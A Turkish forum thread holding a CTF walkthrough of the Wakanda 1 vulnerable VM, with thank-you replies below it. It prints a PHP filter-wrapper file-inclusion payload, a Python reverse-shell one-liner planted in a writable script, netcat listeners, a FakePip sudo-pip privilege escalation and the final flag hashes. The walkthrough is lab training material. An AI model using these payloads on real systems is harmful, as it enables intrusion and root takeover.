İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Wakanda 1 Açıklı Makine Çözümü 'Rairsa

10-09-2018 18:05
#1
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65

Merhaba THT ailesi
Sizlere bugün "Wakanda 1 Açıklı Makinesinin Çözümünü" anlatacağım


Wakanda 1'i buradan indirebilirsiniz.

Görevler;
1-Flag1 bulmak
2-Flag2 bulmak
3-root.txt bulmak


Programı kurduktan sonra Kali makinemize geçiyoruz ve terminale
Kod:
netdiscover
yazıyoruz



Not : Netdiscover programı ağınızda bulunan cihazları gösterir.

Resimde görüldüğü gibi açıklı makinemizin ip si "10.0.2.7"

Nmap ile ip'yi taratalım. Nmap ile taratmak için terminale
Kod:
nmap -A 10.0.2.7
yazıyoruz



Çıkan sonuçlarda 3333 portunda ssh çalıştığını ve 80 portunda apache çalıştığını gördük.
İp'mizi Firefox'a yazalım;



ve karşımıza bir market sayfası çıkıyor. CTRL ve U tuşuna basarak sayfanın kaynağına gidelim




Karşımıza HTML kodları çıkıyor. Bu sayfada ilk dikkatimi çeken bir yorum satırının bırakılmasıydı
Yorum satırında yazan "?lang=fr" yazan yeri url'mizin devamına yazalım
Yani ;

Kod:
10.0.2.7/?lang=fr


Sayfamız Fransızca ya dönüştü. Burada "?lang=" yerinden sonra php wrapperi yazalım ve index dosyasını almayı deniyelim

Kod:
php://filter/convert.base64-encode/resource=index


Karşımıza base 64 tipi şifre çıktı bu şifreyi kopyalayıp google'a base64 decode yazıyoruz ardından ilk siteye girip şifremizi yapıştırıyoruz.



Şifre den çıkanlar php kodları. Kodların en üstünde;
Kod:
$password ="Niamey4Ever227!!!" ;//I have to remember it
yazıyor.

Kodların en altında ise;
Kod:
<p>Made by<a href="#">@mamadou</a></p>
yazıyor.

Hatırlarsanız makinemizde 3333.cü portta SSH servisi açıktı;
SSH servisini çalıştırmak için gerekenler;
Kod:
ssh kullanıcıadı@ipadresi -p port
ve altına şifre girmemiz gerekiyor.
Php kodlarında şifreyi bulduk. Bize kullanıcı adı lazım. Kullanıcı adını ise php kodlarında en altta bulunan ve başında @ işareti olan mamadou kelimesini yazalalım;
Yani terminale ;
Kod:
ssh mamadou@10.0.2.7 -p 3333
yazıyoruz.
Şifre için : Niamey4Ever227!!! yazıyoruz



Sisteme sızmayı başardık ancak terminal komutları çalışmıyor. Uyarıları biraz daha detaylı okuduktan sonra bunun shell olduğunu anlıyorum.



Python shell'den çıkmak için terminale
Kod:
import pyt ardından pty.spawn("/bin/sh")
yazıyoruz.


Ardından "ls" yazıyoruz karşımıza flag1.txt adlı dosya çıkıyor.

Kod:
cat flag1.txt
komutu ile flag1.txt dosyasını okuyoruz.



Bayrağımızı bulduktan sonra "pwd" komutunu yazıyoruz ve nerede olduğumu öğreniyoruz.
"/home/mamadou"
"cd .." yazarak "home" dizinine gidiyoruz ve "ls" komutu ile dizinde başka neler olduğuna bakıyoruz.



Burada dikkatimi çeken "devops" yazması.
"cd devops" komutu ile devops klasörüne giriyoruz ve ls komutunu yazıyoruz karşımıza flag2.txt adlı bir dosya çıkıyor.




"cat" komutu ile dosyayı okumaya çalıştığımız zaman hata alıyoruz.



Ardından sistemde ikinci bir kullanıcı olup olmadığını kontrol etmek için
Kod:
cat /etc/passwd

komutunu terminale yazıyoruz ve dosyayı biraz inceledikten sonra dosyanın en altında "devops" adlı bir kullanıcının olduğunu görüyoruz.

Komut satırına
Kod:
find / -user devops
yazarak devops kullanıcısının dosyalarını görüyoruz.



Burada komutun hemen altında yazan "/srv/.antivirus.py" dosyası ilgimi çekiyor ve terminale
Kod:
nano /srv/.antivirus.py
yazyıyoruz.



Bu dosya python dosyası olduğu için buraya reverse shell kodu yazabiliriz.
Bunun için
BU siteden reverse shell kodlarını alıyoruz dosyanın içine yapıştırıyoruz.

Kod:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Not : 2. satırda parantezler içinde yazan 10.0.0.1 ip sini kendi ip adresimizle değiştiriyoruz ve yanında 1234 yazan port numarasını 4444 olarak değiştiriyoruz.
Not : İp adresini öğrenmek için terminale "ifconfig" yazıyoruz.



Ardından belirttiğimiz portu dinlemek için terminale
Kod:
nc -lvp 4444
yazıyoruz ve 4444 portunu dinliyoruz.

Biraz bekledikten sonra shell düşüyor ve artık makineye devops kullanıcısı ile girmiş oluyoruz.



Kod:
cat home/devops/flag2.txt
yazarak ikinci bayrağımıza erişiyoruz



Şimdi sıra root.txt dosyasını bulmaya geldi. root.txt dosyasını okumak için root olmamız gerekiyor.

Komut satırına
Kod:
sudo -l
yazıyoruz



Resimde de görüldüğü üzere "pip" servisi root haklarında çalışıyor. Biz "Fakepip" programı ile root olabiliriz.
Bunun için yeni bir terminal açıp

Kolaylık olması açısından "cd Desktop/" yazıyoruz

Ardından;
Kod:
git clone https://github.com/0x00-0x00/FakePip.git
yazıyoruz

Daha sonra terminale
cd FakePip
nano setup.py yazıyoruz ve setup dosyasının içine giriyoruz.

Burada "RHOST" yazan yere kendi ip adresimizi yazıyoruz. Ve CTRL + O tuşuna basarak dosyayı kaydediyoruz.




Ve setup.py dosyasını kopyalayıp /var/www/html dosyasının içine yapıştırıyoruz

Bunları yaptıktan sonra terminale ;

Kod:
service apache2 start
yazıyoruz

Devops kullanıcısının terminaline
Kod:
wget http://ipadresiniz/setup.py
yazıyoruz.



Not : Fakepip programı 443 numaralı portta çalışır
Yeni bir terminal açıyoruz ve içine;
Kod:
nc -lvp 443
yazıyoruz ve bu şekilde 443 numaralı portumuzu dinliyoruz

Tekrardan devops kullanıcısının terminaline

Kod:
sudo /usr/bin/pip install . -upgrade -force-reinstall
yazıyoruz.

Eğer her adımı doğru yaptıysanız 443. porttan root erişiminde olacaksınız.

Ve root terminaline
cd root
cat root.txt
yazarak root dosyasını okuyabilirsiniz



Flag1 : d86b9ad71ca887f4dd1dac86ba1c4dfc
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
Root: 821ae63dbe0c573eff8b69d451fb21bc


Yazıda anlamadığınız veya takıldığınız bir yer olursa özel mesaj yolu ile benimle iletişime geçebilirsiniz.
'Rarisa
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
LifeHacker, 'Flash, M3m0ry Teşekkür etti.

10-09-2018 18:06
#2
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
908
Konular:
86
Emeğine Sağlık
10-09-2018 18:06
#3
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.359
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Konular:
31
Emeğinize sağlık güzel paylaşım
10-09-2018 18:07
#4
oldnco - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Yaş:
29
Mesajlar:
1.525
Teşekkür (Etti):
636
Teşekkür (Aldı):
370
Konular:
43
Eline emeğine sağlık.
10-09-2018 19:05
#5
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Emeğine Sağlık
Alıntı:
theokeleS´isimli üyeden Alıntı Mesajı göster
Emeğinize sağlık güzel paylaşım
Alıntı:
oldnco´isimli üyeden Alıntı Mesajı göster
Eline emeğine sağlık.
Teşekkür ederim
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
10-09-2018 19:10
#6
LifeHacker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
854
Teşekkür (Etti):
133
Teşekkür (Aldı):
117
Konular:
117
Güzel farklı olmuş eline sağlık.
Kullanıcı İmzası
"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK
10-09-2018 20:01
#7
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
LifeHacker´isimli üyeden Alıntı Mesajı göster
Güzel farklı olmuş eline sağlık.
Teşekkürler (:
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
16-09-2018 18:28
#8
"Squ4LL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Mesajlar:
13.304
Teşekkür (Etti):
100
Teşekkür (Aldı):
2207
Konular:
772
Ellerine sağlık
18-09-2018 17:35
#9
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
"Squ4LL´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık
Teşekkür ederim komutanım
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
22-09-2018 19:47
#10
Ceys - ait Kullanıcı Resmi (Avatar)
Moderasyon Lider Yardımcısı
Üyelik tarihi:
04/2016
Nereden:
Ötüken
Mesajlar:
7.014
Teşekkür (Etti):
141
Teşekkür (Aldı):
3043
Konular:
687
Eline sağlık Rairsa bu tür konuları görmek güzel
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı